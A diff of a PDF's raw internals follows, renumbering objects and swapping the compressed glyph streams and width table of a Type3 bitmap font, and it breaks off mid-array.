/FlateDecode >> @@ -6954,7 +5824,7 @@ x pé{€IO_…’¢ÒT.}§g ßE!¨'–ËÓEAžÁ¾¡þÀÿ0XÀ¾AžËÕ“+ ‰;“ endstream endobj -1196 0 obj << +1070 0 obj << /Length 157 /Filter /FlateDecode >> @@ -6968,7 +5838,7 @@ x ì@ÌÀß#äÁHÌD؈:Q'þ€ˆ@Ì&> f0ñd˜82î>3Ñ dfâ ¸™¢Dp¹zrr@Ä:Õ endstream endobj -1197 0 obj << +1071 0 obj << /Length 107 /Filter /FlateDecode >> @@ -6979,7 +5849,7 @@ x sé{ú*”•¦ré;8+E]¢zb¹<]äìêüƒõìäðì:¸\=¹¹{-= endstream endobj -1198 0 obj << +1072 0 obj << /Length 155 /Filter /FlateDecode >> @@ -6993,7 +5863,7 @@ x ü òìÔ€Aûòøð Žöêá´ÿ#ÿ‡ÿÆ ?0`ÿ ÿ þÀÿ†ÿ@¡.WO®@.…8 endstream endobj -1199 0 obj << +1073 0 obj << /Length 110 /Filter /FlateDecode >> @@ -7007,7 +5877,7 @@ x õÿÿÿÿÄÿ °‘§\®ž\\ºâAŠ endstream endobj -1200 0 obj << +1074 0 obj << /Length 103 /Filter /FlateDecode >> @@ -7015,25 +5885,7 @@ stream xÚ31Ö3µT0P0W04S06W02TH1ä*ä2 (˜B$’s¹œ<¹ôÃŒ,¹ô=L¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]êÿÿÿðÿÿÿ0 âs¹zrrå$~ endstream endobj -1201 0 obj << -/Length 103 -/Filter /FlateDecode ->> -stream -xÚ31Ö3µT0P0W04S06W02TH1ä*ä2 (˜B$’s¹œ<¹ôÃŒ,¹ô=L¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]êÿÿÿðÿÿÿ0 âs¹zrrå$~ -endstream -endobj -1202 0 obj << -/Length 117 -/Filter /FlateDecode ->> -stream -xÚ31Ö3µT0P°T02W06U05RH1ä*ä22 -()°Lr.—“'—~8P€KßLzú*”•¦ré;8+ré»(D*Äryº(Ø0È1Ôá†úl¸ž;¬c°ÇŠí Èl ärõä -äÇ\+ß -endstream -endobj -1203 0 obj << +1075 0 obj << /Length 168 /Filter /FlateDecode >> @@ -7041,16 +5893,7 @@ stream xÚ31Ö3µT0P0bCSC…C®B.cs ßÄI$çr9yré‡+›sé{E¹ô=}JŠJS¹ôœ€|…hCƒX.Ovþ;¢ù†: ÁPƒNØÿÿÿÿÿÿF0Ø1ü`€uŒ@¢†ñQÄf ñƒù„Àf2ØJÆìó~ ñ€¿‚ñ;—«'W ÇžsË endstream endobj -1204 0 obj << -/Length 251 -/Filter /FlateDecode ->> -stream -xÚ…±JA†'\!Ls­ÝÎ èÞ±žšÆ…Á+­,ÄJ--íÄ;ðÅy‘µ²4åB–[çO"h£ÍWì¿üßÌì¹Ýf,•4²s n,Í¡ÜÖüÀÎéc%ûÍ:¹¹çIËöRœc{ªÏlÛ3yz|¾c;9?–šíT®j©®¹ -fDT„¿P&E—{åh+ç•9G2ËÏD~þ>/BG¯Eðô$E7è~ }§ø¬€ŸK…ÑvmV›:¶¼«$ê,HŠ@•%¡j»}¦W”}þa³ÂzHõ‘ ¦OØ#b£¼A=ðb2ñßãà~|Òò0Ž -endstream -endobj -1205 0 obj << +1076 0 obj << /Length 239 /Filter /FlateDecode >> @@ -7058,7 +5901,7 @@ stream xÚ1NÄ0Dg•"Òo|û$Q6ÍZZ‰HPQ *–’‚ÕÒ!ì£ýp!eŠUÌ8âi¾ý=o¶ýÕpíZ·-§uCçŽ|H?Я¶\¼¾Ë~”æÉõƒ4wœJ3Þ»óéóMšýã?¸çε/2"På˜<>Ïå uÁfA@5ãž`cÌO4ês´1dµ1gõÊ®šƒîêɧï:ÙôeÔPø~•KÙœ-ª˺QvõOÔhù9–ŒXÒÀÜ…H$%Ë RM ŸÒZÉlémb– „d·Ùr)}ÙA!·£<Ê/}L~ü endstream endobj -1206 0 obj << +1077 0 obj << /Length 263 /Filter /FlateDecode >> @@ -7066,7 +5909,7 @@ stream xÚuνJÄ@ðYR¦‰oyMr¹ÀÙÜÂy‚)­,ÄJ--í–$baé#ø*Ä€…íÙbÉ8ëGió+þó9/wª]ÊiFÛÍ ªftQà5– sªÊŸÊù®jÌN¨\`v 1fõ!ÝÞÜ]b¶:Ú£³5”Ÿa½&HzЃÐZ]À(°&ÐDv) ÿZðÚEÖµ^mŸV­vjRPÜkYß-ÿ™›À€òB4‡x1+É›²>ß[ÐOBò:@|ÓƒFA:änKã¡ýe’Ì4ÒbÚˆå¯Çqã4¿³Kù…mÂÛ˜¡íåxÚá~ÇøÚ⃌ endstream endobj -1207 0 obj << +1078 0 obj << /Length 191 /Filter /FlateDecode >> @@ -7075,7 +5918,7 @@ xÚ Â@EGR¦É2'pÖa!F0… •…X©¥…¢­ÉÑr”!¥EÈ8 I¥ ûàÏû33;MRŠ(‘oSJb:ÅxEk%GU/˜hvd-š•LÑkºßg4ÙfA’sÚÇ°È \à1×0·2wà˜{(Ÿ¡`‚« ÃUOÂ\+rBZt‚ð%p ¬á#'*=•žJ@« šŸðõÒ¿Ï«F»a;ÂWh—nñ ³ƒI endstream endobj -1208 0 obj << +1079 0 obj << /Length 184 /Filter /FlateDecode >> @@ -7084,7 +5927,7 @@ x ×,iºÔu8‹q…/ÂaoM endstream endobj -1209 0 obj << +1080 0 obj << /Length 190 /Filter /FlateDecode >> @@ -7093,7 +5936,7 @@ x æ£ðõ®ØîKÿëÝùÓd¹Ê0FM•j\i¼jx@½˜%\îPPGL2P[ê‚2;|=ß7PÅ~¤K<ÑäL‰•s ´Â9×óËy|¥9#l K#‚vÓœ_ó[¹Z²½äC„N Ò_‹¦C£•èFôŒÏ,úa8è—‘[NÔøXT®®þQ­€ü÷âŠÝ endstream endobj -1210 0 obj << +1081 0 obj << /Length 218 /Filter /FlateDecode >> @@ -7104,7 +5947,7 @@ A ™oö̤Å/½ó`t™œÝÿ˜þRôø27ÈäVÖ¯½ifðöƒíh·¾hãÛ`+-·Rû¡ÔÑÒìNç]Ódvg9 endstream endobj -1211 0 obj << +1082 0 obj << /Length 183 /Filter /FlateDecode >> @@ -7112,7 +5955,7 @@ stream xÚ31Ö3µT0P0bCSC…C®B.c ßÄI$çr9yré‡+[pé{E¹ô=}JŠJS¹ôœ€|…hCƒX.O…úÿÿþÿÿD|?€bØ0ÿ ÿAD}°ò€ÿÁ&> f0ñH0b!þO ¶ƒn%Ørv¸ƒÀî³?sóˆ?À>û æË `Ÿs¹zrríÇG endstream endobj -1212 0 obj << +1083 0 obj << /Length 147 /Filter /FlateDecode >> @@ -7123,7 +5966,7 @@ x õÿÿÿÿÄÿ Øæ Œ„ † ‚ƒ`|$€lthv›bˆ)ØŒ‡6 ¢Žä£ÿQ Ø.WO®@.ÌŒ‡r endstream endobj -1213 0 obj << +1084 0 obj << /Length 145 /Filter /FlateDecode >> @@ -7132,7 +5975,7 @@ x Á€ƒø$`@±ØCLÁmQDýÿ ÿ!Ä( ,ÆåêÉÈæxô endstream endobj -1214 0 obj << +1085 0 obj << /Length 227 /Filter /FlateDecode >> @@ -7141,7 +5984,7 @@ xÚ AÂT(PR$‚ÖÞŽkÍ ¸7eŠU†ÙI"QÒ|Åìß{;—Ý5袥ùŒº½´¸Á°ÐaC]8®<¿ár@ÿHaþVÇè‡;zß~¼¢_Þ_S‹~EO-5kVE*#TòÉPËŽaa¥'\¦BÙƒ°û‰«oè¹Ò\Qéõ4÷pf<á¢`2éß”²Oà$‡Ì˜gãßëíµúD> @@ -7152,7 +5995,7 @@ x õÿþÿùÿŸñÿ?cÀÀ€êÄÿÿÿ±4± Nàô%—«'W žˆ‡ä endstream endobj -1216 0 obj << +1087 0 obj << /Length 108 /Filter /FlateDecode >> @@ -7161,7 +6004,17 @@ x Æ\ú@Q.}O_…’¢ÒT.}§g ßE!ÚPÁ –ËÓE¡þÿÿÿÿÿÿà >ÿ†ÁŽ±¹›ËÕ“+ H¨X~ endstream endobj -1217 0 obj << +1088 0 obj << +/Length 156 +/Filter /FlateDecode +>> +stream +xÚ31Ö3µT0P0UÐ5T0Ò† +)†\…\Æ&@A ×"“œËåäÉ¥®`lÂ¥ïæÒ÷ôU()*MåÒw +pV0äÒwQˆ6T0ˆåòtQ``ÿÿ¿ÿÿÿHXŒùÃ`'$@DœøD°?`øÇÀÿ€¡žAH¨?À`ò•üÿÿ @OþjÿÿhPœËÕ“+ UX‹ +endstream +endobj +1089 0 obj << /Length 218 /Filter /FlateDecode >> @@ -7171,7 +6024,7 @@ x 8hP÷Ãýÿø­žHF¬é–=a…‹,oËÚ>“U.k¹9‰s endstream endobj -1218 0 obj << +1090 0 obj << /Length 123 /Filter /FlateDecode >> @@ -7179,7 +6032,7 @@ stream xÚ31Ö3µT0P0bCSC…C®B.cs ßÄI$çr9yré‡+›sé{E¹ô=}JŠJS¹ôœ€|…hCƒX.O…úÿþÿÿ€L€Å˜ŒÁN|Œ?ˆ êÿÿÿÿã?*ûÀåêÉÈé f’ endstream endobj -1219 0 obj << +1091 0 obj << /Length 177 /Filter /FlateDecode >> @@ -7190,7 +6043,7 @@ x õøÿüÿÀ ÿBü`°ÿW$þð‰ü{ª1ˆy Ÿ‘‰ùŒ0¢Ÿñ1Œh†í͇ÄqÑ|¼F¼‡ï™aÄ Ñ𕨠‚l¢è·?`¿!°—«'W ±,ˆ endstream endobj -1220 0 obj << +1092 0 obj << /Length 194 /Filter /FlateDecode >> @@ -7199,7 +6052,7 @@ x P‚$Ž¤u½Ö’[GEÓev›¶ æKÞ1Çî»hÑ8º&nL؃-;CF¹XïÀA_ í>¡ôpŠÇÃi º?!å—&+ŒRå"c¢(ɉ(§N+˜ÆµGÍSroˆ‰›‚W\¯Š‹"­àŠ¬æüÏ ¦+éÕtI…–ðߣmÅ›h5|Ö ¸üˆ‹¢dXB]/†qsøº‰| endstream endobj -1221 0 obj << +1093 0 obj << /Length 170 /Filter /FlateDecode >> @@ -7209,7 +6062,7 @@ x ƒ›Zª¯šëpéq‹o¡lª endstream endobj -1222 0 obj << +1094 0 obj << /Length 174 /Filter /FlateDecode >> @@ -7217,7 +6070,7 @@ stream xÚ31Ö3µT0P0bSC…C®B.cs ÌI$çr9yré‡+›sé{E¹ô=}JŠJS¹ôœ€|…hCƒX.O…úÿÿ0üÿÿÿˆø"þ3Åþ70`øH؃þ@‚ýŒ`?€#^¬„ùŠ^°Q`Cƃ-YÉ ²œä fƒ€² Ô$êÿ700€ F"Àb\®ž\\æ„wN endstream endobj -1223 0 obj << +1095 0 obj << /Length 209 /Filter /FlateDecode >> @@ -7225,7 +6078,7 @@ stream xÚÅÐ1nÂ0Æñ/Ê€ô–!ïÔ &HYj‰‚Ô •Ú©CÕ @°Æ9j1CäÇ‹KªÞ ’õìåû{iËŠs.y^,ØV\.x_Љ¬ÕÛœWËûÓîHëšÌ[KæEïÉÔ¯|9_dÖoÏ\ÙðgÁùÕ† ùƃHLd€ pÝLià¡'ÒîAi û?’NIû¬ iïÚ&tZÁéà0÷^gú±È…Ÿ¶X{c¹þ‚Y7‘öÉ01ÖÞñ¿<¶5½Ó ¯ endstream endobj -1224 0 obj << +1096 0 obj << /Length 197 /Filter /FlateDecode >> @@ -7234,7 +6087,7 @@ xڕС ŒÖ¤FscT,èr¾0Ê–S²iNûf‹EN†`æÒY9†»Q‰¶3p‚qNÊNÙ3¼ÿ¶ßO0ïÉn‹ßè¶ ×ÄZ¿’J4½&}þ5tÊò›¦y+™A²ý ½-ؼ+Ô€³Wø2>z endstream endobj -1225 0 obj << +1097 0 obj << /Length 236 /Filter /FlateDecode >> @@ -7244,7 +6097,7 @@ D ©å¨”ºæDJÞsÕ ‰gõ­Ü?ñ¦åx#UÃñmŽí¥¼<¿>rÜ\IÉq+·¥wÜn…˜™åº2ûÐÌÌ4w„C0Mý€¤LúNÔéL”túAø ¨9ÁçÒ„Éa=tC¹6”8y€ÇF¢Ì›Ôa¥OÚ2éý/òaÁ<Ãô&ÄØùE>oùš¿åxv endstream endobj -1226 0 obj << +1098 0 obj << /Length 124 /Filter /FlateDecode >> @@ -7255,7 +6108,7 @@ x õÿÿÿÿÄÿÿ¡êêð@†H0 zÂþÿ(Qÿÿ—ËÕ“+ +òT¬ endstream endobj -1227 0 obj << +1099 0 obj << /Length 167 /Filter /FlateDecode >> @@ -7265,7 +6118,7 @@ x ­,Œ•ZZh´†£qŽ@IaGhôf'_ñϬ‹gÉ‚#}SËÎqbùléF.b27§+e™=»˜ÌZ3™bÃûóB&Û.Ù’Éù`9:R‘s)U*µH]JóíØý^‡¿w˜Ÿø¤Ôè¨%ÂH«´RQCôª/ê‰~ú´*hGo8‚˜ endstream endobj -1228 0 obj << +1100 0 obj << /Length 189 /Filter /FlateDecode >> @@ -7275,7 +6128,7 @@ x ]’ xB˜i ¿´LHäÊ›1VÞL0óJRþa”…¢Vèu¦èZ À¥À-¾òVi endstream endobj -1229 0 obj << +1101 0 obj << /Length 197 /Filter /FlateDecode >> @@ -7284,7 +6137,7 @@ xÚϯ ÂPð#†Á)>‚çt»ºËÂœà‚ É &5mÂ.øb_CY°N wíztøo,È¿ðNøìvÓéE‚‚ì69‚æWh .-rZùe¶D/@sL¶@³Ï5šÁ€6ëíMoØ%n}šðÏŸÂ :ƒš–ßæ}v%Ö$@ö—F•´T÷iX°zÒûÓ[õñ¬¿VÎÉ!zyMŽì-¹ß+_ªX=”Ey>JÍ3CN™.°àï{ŒK endstream endobj -1230 0 obj << +1102 0 obj << /Length 192 /Filter /FlateDecode >> @@ -7296,7 +6149,7 @@ t â‹î¬ì†q“©ÍÒÚÐð@# ~8 ©¡¸ôŽæÚØ7űÚdzm˜'cÈúðh„¢ü/–ämÙý¢:œ¸À“^[Õ endstream endobj -1231 0 obj << +1103 0 obj << /Length 191 /Filter /FlateDecode >> @@ -7307,7 +6160,7 @@ A+ }å:exÅ\³T¿:8^pV¢ÝQ>E»’m¹¦ûíqF;ÛÌ)C» }FéËEÜ$ s­´àXBט^H”ȃ©ÁÃ@ž?|be¨®ŸàzY©E—ƒâÿðTZ_Õq×-`öRÅ!a~…ˆƒ„®K<.KÜâj/\ endstream endobj -1232 0 obj << +1104 0 obj << /Length 187 /Filter /FlateDecode >> @@ -7317,7 +6170,7 @@ xÚ Œ-¶0ª±éþ~Ð*ž?¢uîmÖ½rç!0±ƒe¥æ] ÔEÓ`ç%ÐÒЖÞ*Åsz endstream endobj -1233 0 obj << +1105 0 obj << /Length 182 /Filter /FlateDecode >> @@ -7327,7 +6180,7 @@ xÚ Än!he!Vji¡h›äh%G°L2ΦÐÖ…}ðgÙ?of§óÇœêÅlS>'t#k5Ñ?œ®”;2{¶–ÌZ§d܆÷ç…L¾]rB¦àCÂñ‘\Á¤"iJzŒDˆÆ=á[5/”ÈjLAOåQ~Ñý‰ß¡@«B_ÕZ¯h4èÊJ—â5¡Î«µ^RMuZ9ÚѲuEJ endstream endobj -1234 0 obj << +1106 0 obj << /Length 193 /Filter /FlateDecode >> @@ -7335,7 +6188,7 @@ stream xڕα‚@ à’.<} L— &Þ`¢“ƒqRG®â›á£øŒ—;[pqÓᾤ½´ý 5)+ÊHñ+•9ís<¡’^&¥|ìŽXLפ*LçÜÅÔ,èr¾0­—S⺡MNÙMC±€Ä  ÿ$z1Ú1Þwxï!"Ëûâ>ô<æôZ™iá&³N°?â>cíH ãRa¸ÊÉHŽ'c Ë:ÇÑ´m™¸O,Î ®ð —ºYK endstream endobj -1235 0 obj << +1107 0 obj << /Length 201 /Filter /FlateDecode >> @@ -7344,7 +6197,7 @@ x ¤7¸¾Ð'Ð* 4u‘ö.æ7ú¹mp Ìb2ræcÀòÝÉZþI÷_þ endstream endobj -1236 0 obj << +1108 0 obj << /Length 154 /Filter /FlateDecode >> @@ -7354,7 +6207,7 @@ x @¾‹B´¡‚A,—§‹ÿû@âÿÆÿÿ˜AûŸz ñHð?°*;&põÿÿÿš4A€Åðk£aÿÿÿ[~ `1.WO®@.òÅ^£ endstream endobj -1237 0 obj << +1109 0 obj << /Length 253 /Filter /FlateDecode >> @@ -7363,7 +6216,7 @@ x A+ ±RK E»#›ÎÇðUò(y„”[,g‚²ìÇ°óÿÿÌÖÕÉzßòq¹áºâꜟJz¥º`;볟Öã íZÊï¸.(¿ÒwÊÛk~ûx¦|wsÁ%å{¾/¹x vÏ’€4¸ˆlnfxYé•DdöItÁ§S¶n\Å#7@efd=º`’El6X4jB*²`„éá¾fÀ}E_éh0‡íb•ôj“1SLÍ€,xÝ>v*‹Å!*:MÃö–Æ¢ó½:²?-y‰%Û§F‚Í@—-ÝÒ7ãè‚> endstream endobj -1238 0 obj << +1110 0 obj << /Length 161 /Filter /FlateDecode >> @@ -7373,7 +6226,7 @@ x @¾‹B4Pe,—§‹Bý øÿ¬“Œ‘ò@dý ùóÿ? ùûÿ ùB~°o’äAdƒü ÉÀ$ÿÉ?Häz“õÿøÿÿÇÿÿIˆ8—«'W ƒzú endstream endobj -1239 0 obj << +1111 0 obj << /Length 132 /Filter /FlateDecode >> @@ -7383,7 +6236,7 @@ x ì ò ØþÃÄ@òx@ýÿ@ü€á?×C1;}pýÿÿþÿÿÿ†A|.WO®@.üØO) endstream endobj -1240 0 obj << +1112 0 obj << /Length 169 /Filter /FlateDecode >> @@ -7395,7 +6248,7 @@ B Fp !Vb :²êƒ­¿4îÝÿ>O¤j‰Ô .»m÷Oñë1üêâþdXˆ÷„ÈVîŽ|¹¢-M -è§úX endstream endobj -1241 0 obj << +1113 0 obj << /Length 198 /Filter /FlateDecode >> @@ -7403,7 +6256,7 @@ stream xÚÌ;‚@à%$Ópçò.¨H)L´²0Vji¡ÑV¸‰Wá(xŒ…[Æ_­Å~Éü³ó‡Á0ŠÑEŸ_ècäáƃ=’¹2Êb½ƒ4gA ΄Spò)§-8él„ôŒs˜ÃQ¹yÀ endstream endobj -1242 0 obj << +1114 0 obj << /Length 115 /Filter /FlateDecode >> @@ -7411,7 +6264,7 @@ stream xÚ31Ö3µT0P0b e¨bÈUÈel䃹 ‰ä\.'O.ýpc.} (—¾§¯BIQi*—¾S€³ï¢m¨`Ëåé¢PÿÿÃÿÿ‰zÁÀ<Œˆúÿÿÿ7ñÿ,ÆåêÉÈî{\W endstream endobj -1243 0 obj << +1115 0 obj << /Length 171 /Filter /FlateDecode >> @@ -7420,7 +6273,7 @@ xÚ½ Â@…·[˜&GÈ\@7!Q°1#¸… •…X©¥…¢õ^,7ðæ[n±ì8šÎȃ÷WÃÑ3ä‚r„Å9œAl&’ø]ö'¨-˜\À,¤c—x½ÜŽ`êÕ s0 nå¹Û =œî=Cê¿bq䙣Ò1 S¥e¬”ö‰K•vI'ì’ö‡mrÿ/)Tžòì8R`ßû¾‡¹…5¼ízfÊ endstream endobj -1244 0 obj << +1116 0 obj << /Length 155 /Filter /FlateDecode >> @@ -7430,7 +6283,7 @@ x @Q…h ÊX.O…úòþÿ¨ÿ$þÿ$ÿÿÏÀPÿD2þÿ`ß$ȃÈù@’Hþ“Èô&ëÿ?:ñÿÿÿÿ7 “q.WO®@.‹£ll endstream endobj -1245 0 obj << +1117 0 obj << /Length 183 /Filter /FlateDecode >> @@ -7438,7 +6291,7 @@ stream xÚ}Ž=‚@…‡XLÃvNàBL¬H·0ÑÊÂX©¥…F[Ù£íQ8¥…a†‚Îb^2ï}¹™KJ)*%³ K†w4÷Ò‹ó +‹ú@¦@½á)j»¥çãuE]íV”¡®é˜QzB[Ä_P¥ ¢:˜…ðá9o’.êAµ@9(¡dq%Ÿ»7@â'a¸ý/=ßµÓGÃ.^¬ÄTyhÆ ‰”pÁ A!\\[Üã>P: endstream endobj -1246 0 obj << +1118 0 obj << /Length 200 /Filter /FlateDecode >> @@ -7448,7 +6301,7 @@ xÚ¥ ¡¯†¾$Úñ¼Ë_È¥÷ªùF­Ñ<£5½Þ¯ì endstream endobj -1247 0 obj << +1119 0 obj << /Length 211 /Filter /FlateDecode >> @@ -7459,7 +6312,7 @@ Z 6_ñBÞ¼Õq;éQH1µ¢.é„â­#Ü¡Ž$ )ѯO«-ö3 æ¤# Æ’cMè°?n0èO$éòÓ³!W© É¾Èùb Á|3à1³õP¢_6Äæ¬ri©Ölxz+=Õ>jO=®Ù]qÝu¿ôìªÊç÷B·V–ŸÅ´~…º[ëÎÿ)×DÅ\|kse8Ã'á·vG endstream endobj -1248 0 obj << +1120 0 obj << /Length 158 /Filter /FlateDecode >> @@ -7468,7 +6321,7 @@ xÚ­ Â@ПJø—ðŸÀÝu£Äj!Fp A+ ±RKAEëõh9J¼AÊÁqc!Ú[̃™Ií`4-ØԈËÞð™m»îjw쎜{Vk±«y\Yù…\/·«|9ê½e_Hx’+5ÐCôÑ8´äÂ#‚$ÒRC®¡¹šˆ\õ¡ì¸ÿBÿ"¨¿xo<ó¼âõõIw endstream endobj -1249 0 obj << +1121 0 obj << /Length 185 /Filter /FlateDecode >> @@ -7477,7 +6330,7 @@ x Â@ЋÀ4!s7q5Æ@T0… •…X©¥EÁÊÍÑrr‹ñ,,Þ2³óÿÔŽg©D’€MÅ&rŽùÆv‚=ê×þpºr^°Ù‹°Yã—M±‘Çýya“o³YÊ!–èÈÅRÈùr¨êGB®ù7 }Kïÿ´D#"×eZS¨¡W¡ÿ!§ˆ("P÷B Ca÷£}­¢9ª6A«ª=> @@ -7485,7 +6338,7 @@ stream xÚ31Ö3µT0P0bc 3…C®B.cS ßÄI$çr9yré‡+›ré{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]ä€Àž¢þÿÿÿ @ü¿A€ÅH2…‚ù`€hàÀ ß €AþAý~ [@óÿ Œÿ€LxÀÀåêÉÈþ:B„ endstream endobj -1251 0 obj << +1123 0 obj << /Length 148 /Filter /FlateDecode >> @@ -7495,7 +6348,7 @@ x @Q…h ÊX.O…úÌÿþÿ`ÿ…¬ÿÁ $0ð()DÚÉ? õþÜÆðêdƒ=˜”ÿH2ÿcÿÏÀåêÉÈÄ£d> endstream endobj -1252 0 obj << +1124 0 obj << /Length 186 /Filter /FlateDecode >> @@ -7504,7 +6357,7 @@ x Â0ÀñW:oéúN`ú¥ÐÅB­`A'qRGE7©…^Ì­×è êØ¡4¾Ø”É? ‰Âé,&žQ@áœÎ>Þ0ÔÍÓ[}pºb*Qì)ŒQ¬¹¢zÜŸévI>ŠŒ>yG”½•¥:ÅôJ•^ý›]ƒS |Á-,ZHZX:È^<rœ[CÂ×Á准’qÊz¤b&Õg¤aì¦QŒ¥À½†¿À•Äþ$›Lã endstream endobj -1253 0 obj << +1125 0 obj << /Length 174 /Filter /FlateDecode >> @@ -7514,7 +6367,7 @@ x @Q…h ÊX.O…úÿ `Ôðÿ?ÃÙaCÄÙ00~ @2?ÀDv`²N2~¨+þߎ ¿#Èß``’ ?Ÿ‡“¿¿G#«¾g``¨?øA6 Hû†@Rž¡†ËÕ“+ Ém¢ endstream endobj -1254 0 obj << +1126 0 obj << /Length 202 /Filter /FlateDecode >> @@ -7524,7 +6377,7 @@ x O ¨.†êçê«oŸk> ¹¶´¬4¶ú…¥4Wè¬&F&ž”™äRŠ¢ª§ÚÑ$¡}¨xY& endstream endobj -1255 0 obj << +1127 0 obj << /Length 237 /Filter /FlateDecode >> @@ -7532,7 +6385,7 @@ stream xÚEαjÃ@ àßdˆ‚ÁzöìØ)ÍCšB=Ò©CÉ”dÌÐÒnÆvÈÐ×jé‹:tÍ&É=Žûîî$%ñÍpÄ!ø:ºãdÀñ-¯"z¥X£!—Znh’‘yæxDæQâd²¿¿}¬ÉLæ÷‘™òKÄႲ)—Ö³µ[{²v§È­õöð+ïðOPy5À‘ Æ@®²äÌ©¤äUíð·-Gÿ[ùÙ;z¿Êßàµ[*ö‚l”ãŽBÉ;¥v\ɼHer”;åSú¾H‹R §Z88 ¾~íKôÑßÍa{ endstream endobj -1256 0 obj << +1128 0 obj << /Length 203 /Filter /FlateDecode >> @@ -7541,7 +6394,7 @@ xÚ Â@…_°L“#8ÐMLRØðL!he!Vji¡h'š£å({„”!qœ-–6ß²ó`ö}›ÄÃtÌ!'<ˆ8 9ñ1¢ Å© å»äp¦iNfËqJf)c2ùŠo×û‰Ìt=ãˆÌœw‡{ÊçŒÞ@в¶^m ´­…ו„û•W÷¨”x:ô däTLdOñ”€_Öû'¤X`–*ºw]!WÒ¢qµ½z¨‘º9KõUóïÐ"§ }}dà endstream endobj -1257 0 obj << +1129 0 obj << /Length 141 /Filter /FlateDecode >> @@ -7549,7 +6402,7 @@ stream xÚ31Ö3µT0Pac S#…C®B.# ßÄI$çr9yré‡+Ypé{E¹ô=}JŠJS¹ôœ ¹ô]¢  b¹<]Øø XŠí¸ˆÿ7001;×ñ¾Äójä‘Ô®ÿÿÿÁÿÿÿ?À0ˆÏåêÉÈÅFJÜ endstream endobj -1258 0 obj << +1130 0 obj << /Length 222 /Filter /FlateDecode >> @@ -7558,7 +6411,7 @@ x Ab $¨(U ¤A›Ý£ù(>BÊÑóÓ„,?kÆÿWíEw¥µ®¸kí.õµ‘i;¯O%/¶ï²$=iÛIºó®¤á^¿>¿ß$­n´‘´ÑçFë6Šx0ڄʬ ˜íÍŽX⌾T†~ÂèËÏ°œfGvÄlŽâgØ×ÎOÈ —˜À<|žðHTGÇ‚+î©¥µ§Ë‡D5ÿWôTŒL3ü*Ù¡¸=·‡2šÿÐþ‚½,·ƒ<Ê8hñ endstream endobj -1259 0 obj << +1131 0 obj << /Length 226 /Filter /FlateDecode >> @@ -7566,7 +6419,15 @@ stream xÚEнNÄ0 ðÿé†J^òñ @ZÚHH•îC¢L ˆ @°Ò>ZåáƧúl·ÀŸDZãTåe}Í9W|Qp•s}ů}PYkP·å|òòN›–Ò#—5¥[ SjïøëóûÒæ~Ë¥?œ?S»c„€Nz¬DÈDF‘â˜Mˆ&4=:4§WâLì• «hLºVÆÚšÄQ—5Aýâ1;Í,òw×Ki üs°Ä™ãÇ…à Îdw;«Ò-¯—y"ŸÍ§\Û¼>¹ÿí[z 3áVc4 endstream endobj -1260 0 obj << +1132 0 obj << +/Length 181 +/Filter /FlateDecode +>> +stream +xÚ•Ï=‚@à!$Ópæ.¿ bâ&ZY+µ´Ðh £pJŠëL±hë$ó%ó^5YºÌ Š(áÍʺÄxÇT²HN)Î7¬4ª¥ª §¨ô–ž×Uµ[QŒª¦cLÑ uMþÁÄ„B9ÓÌÆ›‹‘ñGÐ3aç(if ãMŽÅ( Œ/½#ì˜`Ëc„÷—V2öOZË¿Z;ý®5îñÜþtý +endstream +endobj +1133 0 obj << /Length 207 /Filter /FlateDecode >> @@ -7577,7 +6438,7 @@ xÚ¥ G9Îð-²c— endstream endobj -1261 0 obj << +1134 0 obj << /Length 241 /Filter /FlateDecode >> @@ -7585,7 +6446,7 @@ stream xÚmŽ1NÄ0E”"Ò4¹ž @’T––E"Th+ ¤Ø´±æ£ø)S„ ãÍ“ü=3ÿuíEÅ5w|ÞpWsÉ/ ©í5ÔgûýóüF»ªGn{ªn5¦j¸ã÷ÓÇ+U»ûkn¨ÚóSÃõ†=6™Ì@! `dÕHpÑë³Îç³¢˜¢¢Œ°0g0º°¿p ã†\ÏF<'Ÿ"D´MÖbLz[‚Îë€õZj6]*7DEñã?°?(£j”A…LP5ãË GÕÔ¡˜µ(O•Y*GÒ@BRƒæ ›è þ5pI endstream endobj -1262 0 obj << +1135 0 obj << /Length 183 /Filter /FlateDecode >> @@ -7595,7 +6456,7 @@ xڕͽ Ù'é`œ010%p1ßà ­‚içBÆt*R¦—€t 2;nB)¼û½¢¦•×4㪙_T+~Ѭý‹.œ:\âãM† endstream endobj -1263 0 obj << +1136 0 obj << /Length 213 /Filter /FlateDecode >> @@ -7606,106 +6467,112 @@ x ÕªË×ÙñÍó?|ÉR3{¿¾‡6ÒnÚRûúæ}Z”´¡ëån endstream endobj -421 0 obj << +1137 0 obj << +/Length 245 +/Filter /FlateDecode +>> +stream +xÚm1NÄ@ EmÉÍa|HB’b«‘–E"Tˆj¡¤`í&G›ŽkøéHÅü 4ÒÓØ£ñnêóv+¥4rVISJ{!O¿rÝ¢‰²þ~9¼ð®ãâ^ê–‹k´¹ènäíøþÌÅîöR*.öòPIùÈÝ^(Ÿ‰(`)3SÚ˜èç¹1›É+-:%ô8p'?, ó\üú‡%ᔀ^Ê‚úH½"È4Ÿ)ÂM¡ñ©úP¨9%7¹Hiè/üŠ!©¯ Gó«dLºâ!n&{„ÁÈë•|ÚÒöÍ J™MøÞc_u|Ç_ž!r· +endstream +endobj +546 0 obj << /Type /Font /Subtype /Type3 /Name /F22 /FontMatrix [0.01204 0 0 0.01204 0 0] /FontBBox [ -1 -19 45 58 ] /Resources << /ProcSet [ /PDF /ImageB ] >> -/FirstChar 21 +/FirstChar 35 /LastChar 121 -/Widths 1264 0 R -/Encoding 1265 0 R -/CharProcs 1266 0 R +/Widths 1138 0 R +/Encoding 1139 0 R +/CharProcs 1140 0 R >> endobj -1264 0 obj -[43.59 0 0 0 0 0 0 0 0 0 0 0 0 43.59 43.59 43.59 0 43.59 43.59 43.59 43.59 43.59 0 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 0 43.59 43.59 43.59 43.59 0 43.59 43.59 0 43.59 0 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 0 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 0 43.59 0 43.59 0 43.59 0 43.59 0 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 43.59 ] +1138 0 obj +[43.59 0 0 43.59 0 43.59 43.59 0 0 43.59 